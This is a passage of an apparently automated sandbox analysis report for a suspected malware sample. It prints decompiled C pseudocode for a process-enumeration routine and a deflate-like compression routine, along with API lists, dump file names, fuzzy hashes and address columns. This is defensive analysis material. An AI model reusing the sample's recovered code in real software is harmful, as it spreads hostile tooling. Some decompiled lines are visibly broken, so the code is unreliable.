                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00D120BF
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D120FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 4175162697-0
                                                                                        • Opcode ID: a2b4522f311e9d8e2b86f4bcc9bc58d70a5ef12c671fc213e635788851f5ee27
                                                                                        • Instruction ID: e172493d7acfe921c868188b85bc5cd0b97028937e6c05bdb8220f69122894e6
                                                                                        • Opcode Fuzzy Hash: a2b4522f311e9d8e2b86f4bcc9bc58d70a5ef12c671fc213e635788851f5ee27
                                                                                        • Instruction Fuzzy Hash: 1C516E71A00315AFDB20CF58D8806BAB3F5FF44314B184569E845D7241EB72EDA5CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D12110(intOrPtr* __edx) {
                                                                                        				void* _v560;
                                                                                        				void* _t5;
                                                                                        				struct tagPROCESSENTRY32W* _t6;
                                                                                        				intOrPtr* _t13;
                                                                                        				void* _t14;
                                                                                        
                                                                                        				_t13 = __edx;
                                                                                        				_t5 = CreateToolhelp32Snapshot(2, 0);
                                                                                        				_t14 = _t5;
                                                                                        				if(_t14 != 0xffffffff) {
                                                                                        					_t6 =  &_v560;
                                                                                        					_v560 = 0x22c;
                                                                                        					Process32FirstW(_t14, _t6);
                                                                                        					if(_t6 == 0) {
                                                                                        						L5:
                                                                                        						return CloseHandle(_t14);
                                                                                        					}
                                                                                        					do {
                                                                                        					} while (E00D18B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
                                                                                        					goto L5;
                                                                                        				}
                                                                                        				return _t5;
                                                                                        			}








                                                                                        0x00d1211f
                                                                                        0x00d12121
                                                                                        0x00d12127
                                                                                        0x00d1212c
                                                                                        0x00d1212e
                                                                                        0x00d12134
                                                                                        0x00d12140
                                                                                        0x00d12148
                                                                                        0x00d12173
                                                                                        0x00000000
                                                                                        0x00d12174
                                                                                        0x00d12150
                                                                                        0x00d1215d
                                                                                        0x00000000
                                                                                        0x00d12150
                                                                                        0x00d1217f

                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D12121
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00D12140
                                                                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 00D12174
                                                                                          • Part of subcall function 00D18B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,00D1215D,0000022C,00000000,?,?), ref: 00D18B47
                                                                                          • Part of subcall function 00D18B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,00D1215D,0000022C,00000000,?,?), ref: 00D18B75
                                                                                          • Part of subcall function 00D18B30: RtlAllocateHeap.NTDLL(00000000,?,00D1215D), ref: 00D18B7C
                                                                                          • Part of subcall function 00D18B30: lstrcpyW.KERNEL32(00000004,?), ref: 00D18B8F
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00D12169
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3893281644-0
                                                                                        • Opcode ID: 415c5e691e1733a270a74a7dccc444e21023ca5c540fe3145abd8b7c503eff13
                                                                                        • Instruction ID: 56f7a314e6164a97963647a8b2acf22f110038a9738fe4201a1737534cce5b03
                                                                                        • Opcode Fuzzy Hash: 415c5e691e1733a270a74a7dccc444e21023ca5c540fe3145abd8b7c503eff13
                                                                                        • Instruction Fuzzy Hash: 95F0623554131476D720EBB5BC4DFEE77ACEB49350F1441A5FE08D2281EF3099968AB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 86%
                                                                                        			E00D16E70(intOrPtr* __ecx, intOrPtr __edx) {
                                                                                        				int _v8;
                                                                                        				int _v12;
                                                                                        				signed int _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				intOrPtr _t274;
                                                                                        				signed char _t282;
                                                                                        				int _t285;
                                                                                        				intOrPtr _t286;
                                                                                        				intOrPtr _t294;
                                                                                        				signed int _t304;
                                                                                        				signed char _t308;
                                                                                        				signed char _t311;
                                                                                        				signed char _t320;
                                                                                        				signed char _t331;
                                                                                        				signed char _t334;
                                                                                        				signed char _t340;
                                                                                        				signed char _t352;
                                                                                        				signed char _t355;
                                                                                        				signed int _t364;
                                                                                        				void* _t366;
                                                                                        				int _t367;
                                                                                        				signed char _t370;
                                                                                        				intOrPtr _t371;
                                                                                        				signed char _t374;
                                                                                        				signed char _t375;
                                                                                        				signed char _t376;
                                                                                        				char* _t377;
                                                                                        				char* _t378;
                                                                                        				char* _t379;
                                                                                        				signed char _t380;
                                                                                        				char* _t381;
                                                                                        				char* _t382;
                                                                                        				signed char _t385;
                                                                                        				signed char _t386;
                                                                                        				signed char _t387;
                                                                                        				char* _t388;
                                                                                        				char* _t389;
                                                                                        				char* _t390;
                                                                                        				char* _t391;
                                                                                        				char* _t396;
                                                                                        				signed char _t397;
                                                                                        				signed char _t398;
                                                                                        				char* _t399;
                                                                                        				char* _t400;
                                                                                        				intOrPtr _t401;
                                                                                        				intOrPtr _t402;
                                                                                        				signed int _t403;
                                                                                        				void* _t404;
                                                                                        				void* _t405;
                                                                                        				signed int _t406;
                                                                                        				void* _t407;
                                                                                        				int _t408;
                                                                                        				intOrPtr _t409;
                                                                                        				int _t412;
                                                                                        				signed int _t413;
                                                                                        				void* _t414;
                                                                                        				intOrPtr* _t415;
                                                                                        				void* _t416;
                                                                                        
                                                                                        				_t402 = __edx;
                                                                                        				_t415 = __ecx;
                                                                                        				_v24 = __edx;
                                                                                        				_v12 = 0;
                                                                                        				if(( *(__ecx + 8) & 0x00080000) == 0) {
                                                                                        					L2:
                                                                                        					_v8 = 0;
                                                                                        				} else {
                                                                                        					_v8 = 1;
                                                                                        					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
                                                                                        						goto L2;
                                                                                        					}
                                                                                        				}
                                                                                        				if( *_t415 != 0) {
                                                                                        					L6:
                                                                                        					_t274 = _t415 + 0x39272;
                                                                                        				} else {
                                                                                        					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
                                                                                        						goto L6;
                                                                                        					} else {
                                                                                        						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
                                                                                        					}
                                                                                        				}
                                                                                        				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
                                                                                        				_v20 = _t274;
                                                                                        				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
                                                                                        				 *(_t415 + 0x58) = 0;
                                                                                        				 *(_t415 + 0x5c) = 0;
                                                                                        				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
                                                                                        				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
                                                                                        				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
                                                                                        					_t397 =  *(_t415 + 0x44);
                                                                                        					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
                                                                                        					_t352 = _t397 + 8;
                                                                                        					 *(_t415 + 0x44) = _t352;
                                                                                        					if(_t352 >= 8) {
                                                                                        						do {
                                                                                        							_t400 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        								 *_t400 =  *(_t415 + 0x48);
                                                                                        								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        							}
                                                                                        							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        						} while ( *(_t415 + 0x44) >= 8);
                                                                                        					}
                                                                                        					_t398 =  *(_t415 + 0x44);
                                                                                        					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
                                                                                        					_t49 = _t398 + 8; // 0x10
                                                                                        					_t355 = _t49;
                                                                                        					 *(_t415 + 0x44) = _t355;
                                                                                        					if(_t355 >= 8) {
                                                                                        						do {
                                                                                        							_t399 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        								 *_t399 =  *(_t415 + 0x48);
                                                                                        								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        							}
                                                                                        							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        						} while ( *(_t415 + 0x44) >= 8);
                                                                                        					}
                                                                                        				}
                                                                                        				_t370 =  *(_t415 + 0x44);
                                                                                        				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
                                                                                        				_t66 = _t370 + 1; // 0x9
                                                                                        				_t282 = _t66;
                                                                                        				 *(_t415 + 0x44) = _t282;
                                                                                        				if(_t282 >= 8) {
                                                                                        					do {
                                                                                        						_t396 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        							 *_t396 =  *(_t415 + 0x48);
                                                                                        							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        						}
                                                                                        						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        					} while ( *(_t415 + 0x44) >= 8);
                                                                                        				}
                                                                                        				_t403 =  *(_t415 + 0x48);
                                                                                        				_t409 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        				_t364 =  *(_t415 + 0x44);
                                                                                        				_v16 = _t403;
                                                                                        				if(_v8 != 0) {
                                                                                        					L31:
                                                                                        					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
                                                                                        						_t285 = _v12;
                                                                                        						goto L58;
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
                                                                                        						 *(_t415 + 0x48) = 0 << _t364 | _t403;
                                                                                        						_t331 = _t364 + 2;
                                                                                        						 *(_t415 + 0x44) = _t331;
                                                                                        						if(_t331 >= 8) {
                                                                                        							do {
                                                                                        								_t391 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        									 *_t391 =  *(_t415 + 0x48);
                                                                                        									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        								}
                                                                                        								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        							} while ( *(_t415 + 0x44) >= 8);
                                                                                        						}
                                                                                        						_t385 =  *(_t415 + 0x44);
                                                                                        						if(_t385 != 0) {
                                                                                        							 *(_t415 + 0x44) = 8;
                                                                                        							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
                                                                                        							do {
                                                                                        								_t390 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        									 *_t390 =  *(_t415 + 0x48);
                                                                                        									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        								}
                                                                                        								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        							} while ( *(_t415 + 0x44) >= 8);
                                                                                        						}
                                                                                        						_t407 = 2;
                                                                                        						do {
                                                                                        							_t386 =  *(_t415 + 0x44);
                                                                                        							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
                                                                                        							_t126 = _t386 + 0x10; // 0x18
                                                                                        							_t334 = _t126;
                                                                                        							 *(_t415 + 0x44) = _t334;
                                                                                        							if(_t334 >= 8) {
                                                                                        								do {
                                                                                        									_t389 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        										 *_t389 =  *(_t415 + 0x48);
                                                                                        										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        									}
                                                                                        									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        								} while ( *(_t415 + 0x44) >= 8);
                                                                                        							}
                                                                                        							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
                                                                                        							_t407 = _t407 - 1;
                                                                                        						} while (_t407 != 0);
                                                                                        						if( *(_t415 + 0x3c) > _t407) {
                                                                                        							do {
                                                                                        								_t387 =  *(_t415 + 0x44);
                                                                                        								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
                                                                                        								_t147 = _t387 + 8; // 0x10
                                                                                        								_t340 = _t147;
                                                                                        								 *(_t415 + 0x44) = _t340;
                                                                                        								if(_t340 >= 8) {
                                                                                        									do {
                                                                                        										_t388 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        											 *_t388 =  *(_t415 + 0x48);
                                                                                        											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        										}
                                                                                        										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        									} while ( *(_t415 + 0x44) >= 8);
                                                                                        								}
                                                                                        								_t407 = _t407 + 1;
                                                                                        							} while (_t407 <  *(_t415 + 0x3c));
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
                                                                                        						E00D16A80(_t415);
                                                                                        					} else {
                                                                                        						E00D15B10(_t415);
                                                                                        					}
                                                                                        					_t416 = _t416 + 4;
                                                                                        					_t285 = E00D16C30(_t415);
                                                                                        					_t408 =  *(_t415 + 0x3c);
                                                                                        					_v12 = _t285;
                                                                                        					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
                                                                                        						L58:
                                                                                        						if(_t285 == 0) {
                                                                                        							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
                                                                                        							 *(_t415 + 0x48) = _v16;
                                                                                        							 *(_t415 + 0x44) = _t364;
                                                                                        							E00D16A80(_t415);
                                                                                        							_t416 = _t416 + 4;
                                                                                        							E00D16C30(_t415);
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t403 = _v16;
                                                                                        						goto L31;
                                                                                        					}
                                                                                        				}
                                                                                        				_t286 = _v24;
                                                                                        				if(_t286 != 0) {
                                                                                        					_t374 =  *(_t415 + 0x44);
                                                                                        					if(_t286 != 4) {
                                                                                        						_t413 = 0;
                                                                                        						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
                                                                                        						_t308 = _t374 + 3;
                                                                                        						 *(_t415 + 0x44) = _t308;
                                                                                        						if(_t308 >= 8) {
                                                                                        							do {
                                                                                        								_t379 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        									 *_t379 =  *(_t415 + 0x48);
                                                                                        									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        								}
                                                                                        								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        							} while ( *(_t415 + 0x44) >= 8);
                                                                                        						}
                                                                                        						_t375 =  *(_t415 + 0x44);
                                                                                        						if(_t375 != 0) {
                                                                                        							 *(_t415 + 0x44) = 8;
                                                                                        							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
                                                                                        							do {
                                                                                        								_t378 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        									 *_t378 =  *(_t415 + 0x48);
                                                                                        									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        								}
                                                                                        								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        							} while ( *(_t415 + 0x44) >= 8);
                                                                                        						}
                                                                                        						_t405 = 2;
                                                                                        						do {
                                                                                        							_t376 =  *(_t415 + 0x44);
                                                                                        							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
                                                                                        							_t230 = _t376 + 0x10; // 0x18
                                                                                        							_t311 = _t230;
                                                                                        							 *(_t415 + 0x44) = _t311;
                                                                                        							if(_t311 >= 8) {
                                                                                        								do {
                                                                                        									_t377 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        										 *_t377 =  *(_t415 + 0x48);
                                                                                        										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        									}
                                                                                        									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        								} while ( *(_t415 + 0x44) >= 8);
                                                                                        							}
                                                                                        							_t413 = _t413 ^ 0x0000ffff;
                                                                                        							_t405 = _t405 - 1;
                                                                                        						} while (_t405 != 0);
                                                                                        					} else {
                                                                                        						if(_t374 != 0) {
                                                                                        							 *(_t415 + 0x44) = 8;
                                                                                        							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
                                                                                        							do {
                                                                                        								_t382 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        									 *_t382 =  *(_t415 + 0x48);
                                                                                        									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        								}
                                                                                        								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        							} while ( *(_t415 + 0x44) >= 8);
                                                                                        						}
                                                                                        						if(( *(_t415 + 8) & 0x00001000) != 0) {
                                                                                        							_t406 =  *(_t415 + 0x18);
                                                                                        							_t414 = 4;
                                                                                        							do {
                                                                                        								_t380 =  *(_t415 + 0x44);
                                                                                        								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
                                                                                        								_t187 = _t380 + 8; // 0x10
                                                                                        								_t320 = _t187;
                                                                                        								 *(_t415 + 0x44) = _t320;
                                                                                        								if(_t320 >= 8) {
                                                                                        									do {
                                                                                        										_t381 =  *((intOrPtr*)(_t415 + 0x30));
                                                                                        										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
                                                                                        											 *_t381 =  *(_t415 + 0x48);
                                                                                        											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                                                                                        										}
                                                                                        										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                                                                                        										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                                                                                        									} while ( *(_t415 + 0x44) >= 8);
                                                                                        								}
                                                                                        								_t406 = _t406 << 8;
                                                                                        								_t414 = _t414 - 1;
                                                                                        							} while (_t414 != 0);
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				memset(_t415 + 0x8192, 0, 0x240);
                                                                                        				memset(_t415 + 0x83d2, 0, 0x40);
                                                                                        				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
                                                                                        				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
                                                                                        				 *(_t415 + 0x2c) = _t415 + 0x9272;
                                                                                        				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
                                                                                        				_t294 = _v20;
                                                                                        				 *(_t415 + 0x38) = 8;
                                                                                        				 *(_t415 + 0x3c) = 0;
                                                                                        				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
                                                                                        				if(_t366 == 0) {
                                                                                        					L98:
                                                                                        					return  *(_t415 + 0x5c);
                                                                                        				} else {
                                                                                        					if( *_t415 == 0) {
                                                                                        						_t404 = _t415 + 0x39272;
                                                                                        						if(_t294 != _t404) {
                                                                                        							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
                                                                                        							goto L98;
                                                                                        						} else {
                                                                                        							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
                                                                                        							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
                                                                                        							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
                                                                                        							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
                                                                                        							_t367 = _t366 - _t412;
                                                                                        							if(_t367 == 0) {
                                                                                        								goto L98;
                                                                                        							} else {
                                                                                        								 *(_t415 + 0x58) = _t412;
                                                                                        								 *(_t415 + 0x5c) = _t367;
                                                                                        								return _t367;
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
                                                                                        						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
                                                                                        						if(_t304 != 0) {
                                                                                        							goto L98;
                                                                                        						} else {
                                                                                        							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
                                                                                        							return _t304 | 0xffffffff;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        			}






























































                                                                                        0x00d16e70
                                                                                        0x00d16e78
                                                                                        0x00d16e7a
                                                                                        0x00d16e7e
                                                                                        0x00d16e8c
                                                                                        0x00d16ea0
                                                                                        0x00d16ea0
                                                                                        0x00d16e8e
                                                                                        0x00d16e94
                                                                                        0x00d16e9e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d16e9e
                                                                                        0x00d16eaa
                                                                                        0x00d16ec7
                                                                                        0x00d16ec7
                                                                                        0x00d16eac
                                                                                        0x00d16eaf
                                                                                        0x00d16ebe
                                                                                        0x00000000
                                                                                        0x00d16ec0
                                                                                        0x00d16ec3
                                                                                        0x00d16ec3
                                                                                        0x00d16ebe
                                                                                        0x00d16ed0
                                                                                        0x00d16ed3
                                                                                        0x00d16edb
                                                                                        0x00d16ee1
                                                                                        0x00d16ee8
                                                                                        0x00d16eef
                                                                                        0x00d16efa
                                                                                        0x00d16f04
                                                                                        0x00d16f0c
                                                                                        0x00d16f16
                                                                                        0x00d16f19
                                                                                        0x00d16f1c
                                                                                        0x00d16f22
                                                                                        0x00d16f24
                                                                                        0x00d16f24
                                                                                        0x00d16f2a
                                                                                        0x00d16f2f
                                                                                        0x00d16f31
                                                                                        0x00d16f31
                                                                                        0x00d16f34
                                                                                        0x00d16f38
                                                                                        0x00d16f3c
                                                                                        0x00d16f24
                                                                                        0x00d16f42
                                                                                        0x00d16f4c
                                                                                        0x00d16f4f
                                                                                        0x00d16f4f
                                                                                        0x00d16f52
                                                                                        0x00d16f58
                                                                                        0x00d16f60
                                                                                        0x00d16f60
                                                                                        0x00d16f66
                                                                                        0x00d16f6b
                                                                                        0x00d16f6d
                                                                                        0x00d16f6d
                                                                                        0x00d16f70
                                                                                        0x00d16f74
                                                                                        0x00d16f78
                                                                                        0x00d16f60
                                                                                        0x00d16f58
                                                                                        0x00d16f7e
                                                                                        0x00d16f8b
                                                                                        0x00d16f8e
                                                                                        0x00d16f8e
                                                                                        0x00d16f91
                                                                                        0x00d16f97
                                                                                        0x00d16fa0
                                                                                        0x00d16fa0
                                                                                        0x00d16fa6
                                                                                        0x00d16fab
                                                                                        0x00d16fad
                                                                                        0x00d16fad
                                                                                        0x00d16fb0
                                                                                        0x00d16fb4
                                                                                        0x00d16fb8
                                                                                        0x00d16fa0
                                                                                        0x00d16fc2
                                                                                        0x00d16fc5
                                                                                        0x00d16fc8
                                                                                        0x00d16fcb
                                                                                        0x00d16fce
                                                                                        0x00d17016
                                                                                        0x00d1701f
                                                                                        0x00d1712b
                                                                                        0x00000000
                                                                                        0x00d17025
                                                                                        0x00d17027
                                                                                        0x00d17030
                                                                                        0x00d17033
                                                                                        0x00d17036
                                                                                        0x00d1703c
                                                                                        0x00d17040
                                                                                        0x00d17040
                                                                                        0x00d17046
                                                                                        0x00d1704b
                                                                                        0x00d1704d
                                                                                        0x00d1704d
                                                                                        0x00d17050
                                                                                        0x00d17054
                                                                                        0x00d17058
                                                                                        0x00d17040
                                                                                        0x00d1705e
                                                                                        0x00d17063
                                                                                        0x00d17067
                                                                                        0x00d17070
                                                                                        0x00d17073
                                                                                        0x00d17073
                                                                                        0x00d17079
                                                                                        0x00d1707e
                                                                                        0x00d17080
                                                                                        0x00d17080
                                                                                        0x00d17083
                                                                                        0x00d17087
                                                                                        0x00d1708b
                                                                                        0x00d17073
                                                                                        0x00d17091
                                                                                        0x00d17096
                                                                                        0x00d17096
                                                                                        0x00d1709f
                                                                                        0x00d170a2
                                                                                        0x00d170a2
                                                                                        0x00d170a5
                                                                                        0x00d170ab
                                                                                        0x00d170b0
                                                                                        0x00d170b0
                                                                                        0x00d170b6
                                                                                        0x00d170bb
                                                                                        0x00d170bd
                                                                                        0x00d170bd
                                                                                        0x00d170c0
                                                                                        0x00d170c4
                                                                                        0x00d170c8
                                                                                        0x00d170b0
                                                                                        0x00d170ce
                                                                                        0x00d170d5
                                                                                        0x00d170d5
                                                                                        0x00d170db
                                                                                        0x00d170e0
                                                                                        0x00d170e3
                                                                                        0x00d170f7
                                                                                        0x00d170fa
                                                                                        0x00d170fa
                                                                                        0x00d170fd
                                                                                        0x00d17103
                                                                                        0x00d17105
                                                                                        0x00d17105
                                                                                        0x00d1710b
                                                                                        0x00d17110
                                                                                        0x00d17112
                                                                                        0x00d17112
                                                                                        0x00d17115
                                                                                        0x00d17119
                                                                                        0x00d1711d
                                                                                        0x00d17105
                                                                                        0x00d17123
                                                                                        0x00d17124
                                                                                        0x00d17129
                                                                                        0x00d170db
                                                                                        0x00d16fd0
                                                                                        0x00d16fd7
                                                                                        0x00d16fe8
                                                                                        0x00d16fdf
                                                                                        0x00d16fe0
                                                                                        0x00d16fe0
                                                                                        0x00d16fed
                                                                                        0x00d16ff2
                                                                                        0x00d16ff7
                                                                                        0x00d16ffa
                                                                                        0x00d16fff
                                                                                        0x00d1712e
                                                                                        0x00d17130
                                                                                        0x00d17136
